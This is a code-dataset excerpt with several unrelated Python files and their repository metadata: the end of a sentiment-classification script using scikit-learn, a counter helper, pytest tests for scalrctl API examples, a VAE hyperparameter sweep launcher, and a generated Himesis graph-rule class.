train_vec = svd.fit_transform(train_vec)
test_vec = svd.transform(test_vec)
print("Explained variance ratio =", svd.explained_variance_ratio_.sum())
elif dim_reduce == "chi2":
print("Performing feature selection based on chi2 independence test")
fselect = SelectKBest(chi2, k=num_dim)
train_vec = fselect.fit_transform(train_vec, train_data_y)
test_vec = fselect.transform(test_vec)
# Transform into numpy arrays
if "numpy.ndarray" not in str(type(train_vec)):
train_vec = train_vec.toarray()
test_vec = test_vec.toarray()
# Feature Scaling
if scaling != "no":
if scaling == "standard":
scaler = preprocessing.StandardScaler()
else:
if scaling == "unsigned":
scaler = preprocessing.MinMaxScaler(feature_range=(0, 1))
elif scaling == "signed":
scaler = preprocessing.MinMaxScaler(feature_range=(-1, 1))
print("Scaling vectors")
train_vec = scaler.fit_transform(train_vec)
test_vec = scaler.transform(test_vec)
# Model training
print('Start Training...It takes a long time...')
if training_model == "RF" or training_model == "BT":
# Initialize the Random Forest or bagged tree based the model chosen
rfc = RandomForestClassifier(n_estimators=100, oob_score=True,
max_features=(None if training_model == "BT" else "auto"))
print("Training %s" % ("Random Forest" if training_model == "RF" else "bagged tree"))
rfc = rfc.fit(train_vec, train_data_y)
print("OOB Score =", rfc.oob_score_)
pred = rfc.predict(test_vec)
print('Precision = ' + str(metrics.precision_score(test_data_y, pred, average=None)))
print('Recall = ' + str(metrics.recall_score(test_data_y, pred, average=None)))
print('F1 = ' + str(metrics.f1_score(test_data_y, pred, average=None)))
print('Accuracy = %.2f%%' % (metrics.accuracy_score(test_data_y, pred) * 100.0))
print('Confusion matrix = \n' + str(
metrics.confusion_matrix(test_data_y, pred, labels=[0, 1, 2])))
print('\nClassification Report:\n' + classification_report(test_data_y, pred,
target_names=target_names))
elif training_model == "NB":
nb = naive_bayes.MultinomialNB()
cv_score = cross_val_score(nb, train_vec, train_data_y, cv=10)
print("Training Naive Bayes")
print("CV Score = ", cv_score.mean())
nb = nb.fit(train_vec, train_data_y)
pred = nb.predict(test_vec)
print('Precision = ' + str(metrics.precision_score(test_data_y, pred, average=None)))
print('Recall = ' + str(metrics.recall_score(test_data_y, pred, average=None)))
print('F1 = ' + str(metrics.f1_score(test_data_y, pred, average=None)))
print('Accuracy = %.2f%%' % (metrics.accuracy_score(test_data_y, pred) * 100.0))
print('Confusion matrix = \n' + str(
metrics.confusion_matrix(test_data_y, pred, labels=[0, 1, 2])))
print('\nClassification Report:\n' + classification_report(test_data_y, pred,
target_names=target_names))
elif training_model == "SVM":
svc = svm.LinearSVC()
param = {'C': [1e15, 1e13, 1e11, 1e9, 1e7, 1e5, 1e3, 1e1, 1e-1, 1e-3, 1e-5]}
print("Training SVM")
svc = GridSearchCV(svc, param, cv=10)
svc = svc.fit(train_vec, train_data_y)
pred = svc.predict(test_vec)
print("Optimized parameters:", svc.best_estimator_)
print("Best CV score:", svc.best_score_)
print('Precision = ' + str(metrics.precision_score(test_data_y, pred, average=None)))
print('Recall = ' + str(metrics.recall_score(test_data_y, pred, average=None)))
print('F1 = ' + str(metrics.f1_score(test_data_y, pred, average=None)))
print('Accuracy = %.2f%%' % (metrics.accuracy_score(test_data_y, pred) * 100.0))
print('Confusion matrix = \n' + str(
metrics.confusion_matrix(test_data_y, pred, labels=[0, 1, 2])))
print('\nClassification Report:\n' + classification_report(test_data_y, pred,
target_names=target_names))
# Output the results
if write_to_csv:
    # test_data has no "id" column; PhraseId (kept in `cols`) is the identifier
    output = pd.DataFrame(data={"PhraseId": test_data.PhraseId, "Sentiment": pred})
output.to_csv("submission.csv", index=False)
print('Time to Train and Test: ' + str(time.time() - current_time) + 's')
| 37.794554
| 116
| 0.653088
|
c2f4b3c02eb2f730f704bd2c88c43da560caa5ac
| 158
|
py
|
Python
|
neurobiba/helpers.py
|
rundleman/neurobiba
|
2fc0a05b71b83fa1b2a621575c43ef08762b0161
|
[
"MIT"
] | null | null | null |
neurobiba/helpers.py
|
rundleman/neurobiba
|
2fc0a05b71b83fa1b2a621575c43ef08762b0161
|
[
"MIT"
] | null | null | null |
neurobiba/helpers.py
|
rundleman/neurobiba
|
2fc0a05b71b83fa1b2a621575c43ef08762b0161
|
[
"MIT"
] | null | null | null |
def counter():
    """Return a closure that yields 0, 1, 2, ... on successive calls."""
def count():
nonlocal value
value += 1
return value
value = -1
return count
default_counter = counter()
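# Editor's usage sketch: the first call returns 0 because `value` starts at
# -1 and is incremented before being returned; each closure produced by
# counter() keeps its own independent count.
#
#   c = counter()
#   c()                # -> 0
#   c()                # -> 1
#   default_counter()  # -> 0 (separate module-level counter)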
| 13.166667
| 27
| 0.550633
|
01f4bb1a65d9c6acc73567edb26763e241595669
| 1,576
|
py
|
Python
|
tests/small/test_examples.py
|
Scalr/pecha
|
40525bfca9fe2bea319ac18ea454a24ead5c405a
|
[
"Apache-2.0"
] | 8
|
2016-07-21T13:03:22.000Z
|
2020-07-18T13:34:09.000Z
|
tests/small/test_examples.py
|
Scalr/scalr-ctl
|
40525bfca9fe2bea319ac18ea454a24ead5c405a
|
[
"Apache-2.0"
] | 18
|
2016-04-04T16:00:23.000Z
|
2019-04-17T12:04:15.000Z
|
tests/small/test_examples.py
|
Scalr/pecha
|
40525bfca9fe2bea319ac18ea454a24ead5c405a
|
[
"Apache-2.0"
] | 8
|
2017-01-03T00:13:18.000Z
|
2019-05-14T17:53:40.000Z
|
# -*- coding: utf-8 -*-
import json
import pytest
import requests
from scalrctl import defaults, examples
@pytest.fixture(scope="module")
def specs():
data = {}
for api_level in defaults.API_LEVELS:
data[api_level] = json.loads(examples._read_spec(api_level))
return data
@pytest.fixture(scope="module")
def post_endpoints(specs):
endpoints = []
for api_level, spec_data in specs.items():
for endpoint, params_spec in spec_data['paths'].items():
if 'post' in params_spec:
endpoints.append((api_level, endpoint))
return endpoints
def _is_valid_endpoint(endpoint):
return not ('/actions/' in endpoint or endpoint in examples.EXCLUDES)
def test_create_post_example(post_endpoints):
for api_level, endpoint in post_endpoints:
try:
examples.create_post_example(api_level, endpoint)
except Exception as e:
assert not _is_valid_endpoint(endpoint) \
and str(e) == 'Invalid API endpoint'
else:
assert _is_valid_endpoint(endpoint)
def test_get_object_name(specs, post_endpoints):
for api_level, endpoint in post_endpoints:
if _is_valid_endpoint(endpoint):
object_name = examples.get_definition(specs[api_level], endpoint)
doc_url = examples.get_doc_url(api_level, endpoint)
resp = requests.get(doc_url)
assert resp.status_code == 200
assert '<p>The JSON representation of a {} ' \
'object.</p>'.format(object_name) in resp.text
| 30.307692
| 77
| 0.659898
|
22b1bdde359a0529302800fc07b9b14fab847347
| 819
|
py
|
Python
|
vae_sweep.py
|
dedbox/TOAD-GAN
|
8a0a84d10f9c5975ae4b1c54f7da99567c8ffd67
|
[
"MIT"
] | 1
|
2021-03-26T21:05:54.000Z
|
2021-03-26T21:05:54.000Z
|
vae_sweep.py
|
dedbox/TOAD-GAN
|
8a0a84d10f9c5975ae4b1c54f7da99567c8ffd67
|
[
"MIT"
] | null | null | null |
vae_sweep.py
|
dedbox/TOAD-GAN
|
8a0a84d10f9c5975ae4b1c54f7da99567c8ffd67
|
[
"MIT"
] | null | null | null |
import subprocess
levels = ['lvl_1-1.txt'] #, 'lvl_1-3.txt']
N = 5
# for level in levels:
# for L in range(0, 49, N):
# print("=" * 80)
# print(f'I={level} H=24 L={list(range(L+1,L+N+1))}')
# procs = [subprocess.Popen(f"python VAE_patches2.py --input-name {level} --hidden-dim 24 --latent-dim {L+i+1} --vae-show true --vae-save true", shell=True) for i in range(N)]
# for p in procs:
# p.wait()
for level in levels:
for H in range(0, 50, N):
print("=" * 80)
print(f'I={level} H={list(range(H+1,H+N+1))} L=7')
procs = [subprocess.Popen(f"python VAE_patches2.py --input-name {level} --latent-dim 7 --hidden-dim {H+i+1} --vae-show true --vae-save true", shell=True) for i in range(N)]
for p in procs:
p.wait()
| 37.227273
| 183
| 0.549451
|
95a3668c4c56f3479dcc2578fb062a7dfebb4097
| 2,630
|
py
|
Python
|
GM2AUTOSAR_MM/Properties/from_eclipse/HM2_if_ConnectedLHS.py
|
levilucio/SyVOLT
|
7526ec794d21565e3efcc925a7b08ae8db27d46a
|
[
"MIT"
] | 3
|
2017-06-02T19:26:27.000Z
|
2021-06-14T04:25:45.000Z
|
GM2AUTOSAR_MM/Properties/from_eclipse/HM2_if_ConnectedLHS.py
|
levilucio/SyVOLT
|
7526ec794d21565e3efcc925a7b08ae8db27d46a
|
[
"MIT"
] | 8
|
2016-08-24T07:04:07.000Z
|
2017-05-26T16:22:47.000Z
|
GM2AUTOSAR_MM/Properties/from_eclipse/HM2_if_ConnectedLHS.py
|
levilucio/SyVOLT
|
7526ec794d21565e3efcc925a7b08ae8db27d46a
|
[
"MIT"
] | 1
|
2019-10-31T06:00:23.000Z
|
2019-10-31T06:00:23.000Z
|
from core.himesis import Himesis, HimesisPreConditionPatternLHS
import uuid
class HM2_if_ConnectedLHS(HimesisPreConditionPatternLHS):
def __init__(self):
"""
Creates the himesis graph representing the AToM3 model HM2_if_ConnectedLHS.
"""
# Flag this instance as compiled now
self.is_compiled = True
super(HM2_if_ConnectedLHS, self).__init__(name='HM2_if_ConnectedLHS', num_nodes=0, edges=[])
# Set the graph attributes
self["mm__"] = ['MT_pre__FamiliesToPersonsMM', 'MoTifRule']
self["MT_constraint__"] = """#===============================================================================
# This code is executed after the nodes in the LHS have been matched.
# You can access a matched node labelled n by: PreNode('n').
# To access attribute x of node n, use: PreNode('n')['x'].
# The given constraint must evaluate to a boolean expression:
# returning True enables the rule to be applied,
# returning False forbids the rule from being applied.
#===============================================================================
return True
"""
self["name"] = """"""
self["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'M2_if')
# Set the node attributes
# Nodes that represent the edges of the property.
# Add the edges
self.add_edges([
])
# Add the attribute equations
self["equations"] = []
def constraint(self, PreNode, graph):
"""
Executable constraint code.
@param PreNode: Function taking an integer as parameter
and returns the node corresponding to that label.
"""
#===============================================================================
# This code is executed after the nodes in the LHS have been matched.
# You can access a matched node labelled n by: PreNode('n').
# To access attribute x of node n, use: PreNode('n')['x'].
# The given constraint must evaluate to a boolean expression:
# returning True enables the rule to be applied,
# returning False forbids the rule from being applied.
#===============================================================================
return True
| 42.419355
| 125
| 0.482129
|